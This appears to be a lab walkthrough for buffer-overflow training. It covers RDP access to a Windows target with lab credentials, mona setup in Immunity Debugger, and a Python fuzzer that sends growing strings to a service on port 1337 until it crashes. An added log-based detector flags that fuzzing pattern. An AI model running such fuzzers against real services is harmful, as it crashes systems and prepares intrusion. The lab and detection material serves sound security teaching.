# 2. Fuzzing

### Fuzzing

Connect to the Windows target over RDP with xfreerdp:

```
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.213.94
```

Once **spiking** has identified a vulnerable command, the next step is **fuzzing**. **Fuzzing** means sending progressively larger inputs to that command to see whether we can crash the program.

On your **Kali box**, connect to port 1337 on MACHINE\_IP using netcat:

```
nc MACHINE_IP 1337
```

**Mona Configuration**

The mona script has been preinstalled; however, to make it easier to work with, you should configure a working folder using the following command (`%p` expands to the name of the process being debugged), which you can run **in the command input box at the bottom of the Immunity Debugger window:**

```
!mona config -set workingfolder c:\mona\%p
```

### fuzzer.py

```
import socket, sys, time

ip = "MACHINE_IP"   # replace with the target's address
port = 1337
timeout = 5

# Build the list of test strings: 100 "A"s, 200 "A"s, ... up to 3000 "A"s.
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # read the prompt the server sends first
        print("Fuzzing with %s bytes" % len(string))
        # Sockets take bytes, so encode the command line before sending.
        s.send(("OVERFLOW1 " + string + "\r\n").encode())
        s.recv(1024)
        s.close()
    except OSError:
        # Connection refused or timed out (socket errors and timeouts are
        # OSError): the previous string most likely crashed the server.
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
```

Run the fuzzer.py script with Python: `python fuzzer.py`

The fuzzer will send increasingly long strings made up of As (up to 3000 bytes). If one of the strings crashes the server, the next connection attempt fails and you should see an error like: "Could not connect to MACHINE\_IP:1337". **Make a note of the largest number of bytes that were sent.**
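From the defender's side, the fuzzer's traffic has a recognisable shape: one client repeating the same command with payloads that grow by a fixed step, well past any legitimate size. The following is an added example, not code from the original page; it assumes a hypothetical server log format (`<timestamp> <client_ip> recv <command> len=<bytes>`) and an assumed 1024-byte legitimate payload limit, and runs on constructed sample lines.

```python
import re
from collections import defaultdict

# Hypothetical server log format (an assumption, not the page's):
#   <timestamp> <client_ip> recv <command> len=<payload bytes>
LINE_RE = re.compile(r"^(\S+) (\S+) recv (\S+) len=(\d+)$")
MAX_PAYLOAD = 1024  # assumed largest payload a legitimate client sends
LADDER_MIN = 5      # same-command requests with growing payloads before we flag

def parse_log(text):
    """Return {client_ip: [(command, payload_len), ...]} in arrival order."""
    per_client = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # skip lines that do not match the expected format
            _ts, ip, cmd, n = m.groups()
            per_client[ip].append((cmd, int(n)))
    return per_client

def longest_ladder(entries):
    """Longest run of consecutive same-command requests whose payload
    sizes strictly increase (the fuzzer's 100, 200, 300 ... pattern)."""
    best = run = 1
    for (pc, pn), (cc, cn) in zip(entries, entries[1:]):
        run = run + 1 if (cc == pc and cn > pn) else 1
        best = max(best, run)
    return best if entries else 0

def detect_fuzzing(text):
    """Return {client_ip: [reasons]} for clients whose traffic looks like fuzzing."""
    findings = {}
    for ip, entries in parse_log(text).items():
        reasons = []
        biggest = max(n for _, n in entries)
        if biggest > MAX_PAYLOAD:
            reasons.append("oversized payload: %d bytes" % biggest)
        ladder = longest_ladder(entries)
        if ladder >= LADDER_MIN:
            reasons.append("increasing-length ladder of %d requests" % ladder)
        if reasons:
            findings[ip] = reasons
    return findings

# Constructed sample: 10.10.10.5 replays the fuzzer's ladder, 10.10.10.6 is benign.
SAMPLE_LOG = "\n".join(
    "2024-01-01T10:00:%02d 10.10.10.5 recv OVERFLOW1 len=%d" % (i, 100 * (i + 1))
    for i in range(30)
) + "\n2024-01-01T10:01:00 10.10.10.6 recv OVERFLOW1 len=12\n2024-01-01T10:01:01 10.10.10.6 recv HELP len=0\n"

print(detect_fuzzing(SAMPLE_LOG))
```

Only the client that ramps through the 100-byte steps up to 3000 bytes is reported; the benign client with a short OVERFLOW1 and a HELP request is not.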
